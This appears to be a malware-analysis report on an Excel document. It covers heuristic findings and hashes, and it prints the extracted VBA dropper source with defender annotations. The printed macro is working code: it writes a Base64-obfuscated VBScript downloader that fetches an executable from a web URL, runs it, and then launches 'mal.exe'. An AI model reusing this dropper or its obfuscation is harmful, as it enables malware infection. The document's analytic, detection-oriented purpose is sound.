Malware Insights
The VBA macro uses the Shell() function to execute a VBScript file named 'j.vbs' located at 'C:\Users\Mr.Teacher\Desktop\j.vbs'. The content of this VBScript is assembled from multiple Base64-encoded strings that are decoded at run time. The VBScript then writes another file, 'a.vbs', to 'C:\Users\Mr.Teacher\Desktop\' and executes it using 'wscript'. Finally, the macro attempts to execute 'mal.exe' from 'C:\Users\Username\Desktop\'. The primary function of the VBA macro is to download and execute a second-stage payload via VBScript.
Heuristics 4
-
VBA project inside OOXML — medium — 2 related findings — OOXML_VBA: Document contains a VBA project — VBA macros present
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents whose source extraction failed, where visible source is unavailable.
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5862 bytes |
SHA-256: 34f16554e7a821911c44a756737e21510dc354dbfdfefc2e581e35af5e57fe4a
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Dropper routine. Decodes an embedded path with bd(), writes a VBScript to
' it one line at a time (each line is Base64-encoded twice, so bd(bd(...))
' recovers the plaintext), launches that script, waits three seconds, and
' then launches a second decoded command. The report summary gives the
' decoded paths as C:\Users\Mr.Teacher\Desktop\j.vbs (run via wscript) and
' C:\Users\Username\Desktop\mal.exe, and characterises the script as the
' second-stage downloader. The Sub is Private with a non-descriptive name;
' how it is triggered is not visible in this truncated listing — the p-code
' heuristic above suggests an auto-exec entry point, to be confirmed.
' Defender note: the FreeFile/Open/Print #/Close file write immediately
' followed by Shell and Application.Wait is the behavioural pattern to alert
' on; the string literals are plain Base64, so decoding them yields the
' file-path and command-line indicators for detection content.
Private Sub ghd()
' File handle for the dropped script.
Dim PayLoadFile As Integer
' Destination path of the dropped script (decoded below).
Dim FilePath As String
FilePath = bd("QzpcVXNlcnNcTXIuVGVhY2hlclxEZXNrdG9wXGoudmJz")
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
' Each Print # writes one decoded line of the VBScript body.
Print #PayLoadFile, bd(bd("WkdsdElIZzZJRk5sZENCNElEMGdZM0psWVhSbGIySnFaV04wS0NKTmFXTnliM052Wm5RdVdFMU1TRlJVVUNJcA=="))
Print #PayLoadFile, bd(bd("SUdScGJTQmlPaUJUWlhRZ1lpQTlJR055WldGMFpXOWlhbVZqZENnaVFXUnZaR0l1VTNSeVpXRnRJaWs9"))
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw="))
Print #PayLoadFile, bd(bd("SUhndVUyVnVaQT09"))
Print #PayLoadFile, bd(bd("SUhkcGRHZ2dZZz09"))
Print #PayLoadFile, bd(bd("SUM1MGVYQmxJRDBnTVE9PQ=="))
Print #PayLoadFile, bd(bd("SUM1dmNHVnU="))
Print #PayLoadFile, bd(bd("SUM1M2NtbDBaU0I0TG5KbGMzQnZibk5sUW05a2VRPT0="))
Print #PayLoadFile, bd(bd("SUM1dVlYWmdkRzliYVd4bElDSkRPbHhWYzdWOWMxeDhiV2x5UVdKaGMxeEVaWE5yZEc5d1hHMW9iQzVsZUdVaUxDQXk="))
Print #PayLoadFile, bd(bd("SUdWdVpDQjNhWFJv"))
Close PayLoadFile
' First launch: the decoded command runs the dropped script (per the summary, wscript ...\j.vbs).
Shell bd("d3NjcmlwdCBDOlxVc2Vyc1xNci5UZWFjaGVyXERlc2t0b3Bcai52YnM=")
' Fixed three-second delay before the second launch — presumably to give the script time to finish; intent inferred.
Application.Wait (Now + TimeValue("0:00:03"))
' Second launch: the decoded path is ...\mal.exe per the summary, presumably fetched by the script above — confirm.
Shell bd("QzpcVXNlcnNcVXNlcm5hbWVcRGVza3RvcFxtYWwuZXhl")
End Sub
Function be(inData)
' Base64-encode a string: every three input bytes become four alphabet
' characters, with "=" padding when the length is not a multiple of three.
' Not called anywhere in the visible listing; the dropper only decodes.
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim encoded, pos, triple, octal, k
For pos = 1 To Len(inData) Step 3
    ' Pack up to three bytes into a 24-bit value; MyASC yields 0 for a missing byte.
    triple = &H10000 * Asc(Mid(inData, pos, 1))
    triple = triple + &H100 * MyASC(Mid(inData, pos + 1, 1))
    triple = triple + MyASC(Mid(inData, pos + 2, 1))
    ' Eight octal digits hold 24 bits; each pair of digits is one 6-bit alphabet index.
    octal = Oct(triple)
    octal = String(8 - Len(octal), "0") & octal
    For k = 1 To 7 Step 2
        encoded = encoded & Mid(Base64, CLng("&o" & Mid(octal, k, 2)) + 1, 1)
    Next
Next
' Replace the characters produced from missing bytes with padding.
If Len(inData) Mod 3 = 1 Then
    encoded = Left(encoded, Len(encoded) - 2) & "=="
ElseIf Len(inData) Mod 3 = 2 Then
    encoded = Left(encoded, Len(encoded) - 1) & "="
End If
be = encoded
End Function
Function MyASC(OneChar)
' Asc() that tolerates an empty string (Mid past the end of input returns ""),
' returning 0 instead of raising an error.
If Len(OneChar) = 0 Then
    MyASC = 0
Else
    MyASC = Asc(OneChar)
End If
End Function
Function bd(ByVal base64String)
' Base64-decode a string into the equivalent byte string (one Chr per byte).
' CRLF, tab and space are stripped first. Raises error 1 when the cleaned
' length is not a multiple of four and error 2 on a character outside the
' alphabet; each "=" reduces the byte count of its group by one.
' This is the only deobfuscation primitive the dropper uses (see ghd).
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cleaned, result, quad, j, ch, sextet, quantum, byteCount, triple
cleaned = Replace(Replace(Replace(base64String, vbCrLf, ""), vbTab, ""), " ", "")
If Len(cleaned) Mod 4 <> 0 Then
    Err.Raise 1, "bd", "Bad Base64 string."
    Exit Function
End If
For quad = 1 To Len(cleaned) Step 4
    ' Four characters carry up to 24 bits.
    byteCount = 3
    quantum = 0
    For j = 0 To 3
        ch = Mid(cleaned, quad + j, 1)
        If ch = "=" Then
            ' Padding contributes zero bits and one fewer output byte.
            byteCount = byteCount - 1
            sextet = 0
        Else
            sextet = InStr(1, Base64, ch, vbBinaryCompare) - 1
        End If
        If sextet = -1 Then
            Err.Raise 2, "bd", "Bad character In Base64 string."
            Exit Function
        End If
        quantum = 64 * quantum + sextet
    Next
    ' Split the 24-bit value into three bytes, then keep only the real ones.
    triple = Chr((quantum \ &H10000) And &HFF) & Chr((quantum \ &H100) And &HFF) & Chr(quantum And &HFF)
    result = result & Left(triple, byteCount)
Next
bd = result
End Function
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB
... (truncated)
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 30208 bytes |
SHA-256: d1edcb673dafdce94d6da8fd37ee5f2f90df0082dab2b6c109fb510591752e00
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||